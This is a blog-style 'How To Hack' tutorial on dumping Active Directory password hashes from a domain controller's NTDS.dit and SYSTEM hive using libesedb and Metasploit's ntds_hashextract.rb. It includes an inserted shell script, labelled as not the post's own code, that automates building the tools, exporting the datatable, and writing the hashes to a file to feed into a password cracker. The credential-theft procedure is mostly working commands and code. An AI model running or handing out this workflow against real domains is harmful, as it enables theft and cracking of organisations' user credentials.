How To Hack: Dumping Domain Password Hashes Using Metasploit (ntds_hashextract.rb)

The ntds_hashextract.rb script is a standalone Ruby tool that quickly extracts Active Directory user account password hashes from the exported datatable of an NTDS.dit database. As it turns out, exporting the datatable can be tricky, so here is a detailed tutorial covering the methodology that I use and continue to have success with.

Step 1 – Install Libesedb

Libesedb is an open source C library for forensically extracting information from Extensible Storage Engine (ESE) database files, which is the format NTDS.dit uses. To get what we need out of NTDS.dit we first have to download and install the library from the following URL:

http://libesedb.googlecode.com/files/libesedb-alpha-20120102.tar.gz


Next, extract the tarball, then configure, build and install the library from the command line:

$ tar xvzf libesedb-alpha-20120102.tar.gz
$ cd libesedb-20120102
$ ./configure
$ make && make install

This is what the finished output looked like for me after everything was done on a fresh copy of Backtrack 5. Note that make install needs root, and if esedbexport later complains that it cannot find libesedb.so, run ldconfig so the linker picks up the freshly installed library.

 

Step 2 – Export Tables From NTDS.dit

Now that you have a working install of the Libesedb library, make sure you've got a proper copy of the NTDS.dit database as well as the SYSTEM registry hive file on your machine. Both are required: the hashes inside NTDS.dit are encrypted with the domain's password encryption key (PEK), which is itself protected by the boot key stored in the SYSTEM hive, so without SYSTEM the datatable alone cannot be decrypted. In case you weren't already aware, you can use another module, ntdsgrab.rb, to obtain these items from a Windows Domain Controller, provided you have proper credentials of course. Here is what they look like on my system after downloading them via the Metasploit Framework.

 

Change into whatever directory contains your loot, in my case the /tmp/NTDS_Grab directory, and run esedbexport (installed by make install, or run straight from the libesedb/esedbtools build directory) against your NTDS.dit database. It will export all of the tables and store them as separate files in a newly created directory called ntds.export.

 

Step 3 – Dump All The Hashes

At this point you're ready to run ntds_hashextract.rb against the datatable (Table #4) and the SYSTEM registry hive file in order to grab all of the domain password hashes. The number in the exported file name is assigned by esedbexport, so confirm it with a directory listing of ntds.export before running the tool. If the domain is large enough (several thousand unique users) the command might take a few minutes to finish on your system, so go grab a cup of coffee. When it's done it should look something like this.

 
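The three steps above, wrapped into one repeatable script. This is an added example and not the post's own commands or Metasploit code: the loot file names, the location of ntds_hashextract.rb (set via the NTDS_HASHEXTRACT variable) and the argument order to the tool (datatable first, then SYSTEM hive, as described in Step 3) are assumptions. Rather than hard-coding "datatable.4", it locates the datatable by name inside the export directory and sanity-checks the loot before spending minutes on an export.

```shell
#!/bin/sh
# Added example (not from the original post): build libesedb, export the
# NTDS.dit tables, and hand the datatable plus SYSTEM hive to
# ntds_hashextract.rb. Assumed: tool path, loot file names, argument order.
set -eu

# Path to the Metasploit tool; override with an environment variable.
NTDS_HASHEXTRACT="${NTDS_HASHEXTRACT:-./ntds_hashextract.rb}"   # assumption

# Refuse to run on missing or empty loot (a zero-byte NTDS.dit is a common
# symptom of a failed copy from the DC).
check_loot() {
    ntds="$1"; system_hive="$2"
    [ -s "$ntds" ] || { echo "missing or empty NTDS.dit: $ntds" >&2; return 1; }
    [ -s "$system_hive" ] || { echo "missing or empty SYSTEM hive: $system_hive" >&2; return 1; }
    return 0
}

# esedbexport names each exported table <table>.<n>; the number is assigned
# at export time, so match on the name "datatable" instead of a fixed number.
find_datatable() {
    export_dir="$1"
    for f in "$export_dir"/datatable.*; do
        if [ -f "$f" ]; then
            printf '%s\n' "$f"
            return 0
        fi
    done
    echo "no datatable.* found in $export_dir" >&2
    return 1
}

# Step 1 (once per box): unpack, build and install libesedb, then refresh the
# dynamic linker cache so esedbexport can find libesedb.so.
install_libesedb() {
    tar xzf libesedb-alpha-20120102.tar.gz
    cd libesedb-20120102
    ./configure
    make && make install
    ldconfig 2>/dev/null || true
    cd ..
}

# Step 2: export every table. esedbexport creates a <name>.export directory
# in the current working directory.
export_tables() {
    esedbexport "$1"
}

# Step 3: run the tool against the datatable and the SYSTEM hive and keep the
# output in a file, reporting how many lines came back as a quick sanity check.
dump_hashes() {
    datatable="$1"; system_hive="$2"; outfile="$3"
    ruby "$NTDS_HASHEXTRACT" "$datatable" "$system_hive" > "$outfile"
    lines=$(grep -c . "$outfile" || true)
    echo "wrote $lines lines of output to $outfile"
}

main() {
    ntds="$1"; system_hive="$2"
    check_loot "$ntds" "$system_hive"
    command -v esedbexport >/dev/null 2>&1 || install_libesedb
    export_tables "$ntds"
    export_dir=$(ls -d ./*.export | head -n 1)
    datatable=$(find_datatable "$export_dir")
    dump_hashes "$datatable" "$system_hive" hashes.txt
}

# Usage: sh dump_ntds.sh /tmp/NTDS_Grab/ntds.dit /tmp/NTDS_Grab/SYSTEM
# The pipeline only runs when both loot paths are supplied.
if [ "$#" -ge 2 ]; then
    main "$@"
fi
```

Run it from the loot directory so the export directory and hashes.txt land next to the source files; the hash output file is then ready to feed into your cracker of choice.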

That’s all for now, check back soon for more in this series.

Thanks for reading.
